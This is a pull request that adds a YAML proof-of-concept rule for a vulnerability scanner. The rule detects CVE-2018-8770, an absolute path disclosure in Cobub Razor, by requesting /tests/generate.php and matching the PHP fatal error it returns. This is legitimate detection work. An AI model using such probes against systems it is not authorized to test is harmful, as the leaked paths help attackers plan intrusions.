### PR TITLE
add razor-cve-2018-8770

### DIFF
--- a/pocs/razor-cve-2018-8770.yml
+++ b/pocs/razor-cve-2018-8770.yml
@@ -1,0 +1,12 @@
+name: poc-yaml-razor-cve-2018-8770-1
+rules:
+  - method: GET
+    path: /tests/generate.php
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Fatal error: Class 'PHPUnit_Framework_TestCase' not found in ") && response.body.bcontains(b"/application/third_party/CIUnit/libraries/CIUnitTestCase.php on line")
+detail:
+  author: we1x4n(https://we1x4n.github.io/)
+  links:
+    - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8770
+    - https://www.exploit-db.com/exploits/44495/

--- a/pocs/razor-cve-2018-8770.yml
+++ b/pocs/razor-cve-2018-8770.yml
@@ -1,4 +1,4 @@
-name: poc-yaml-razor-cve-2018-8770-1
+name: poc-yaml-razor-cve-2018-8770
 rules:
   - method: GET
     path: /tests/generate.php


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
razor-cve-2018-8770绝对路径泄漏漏洞
## 测试环境
https://github.com/cobub/razor/archive/v0.8.0.zip
## 备注
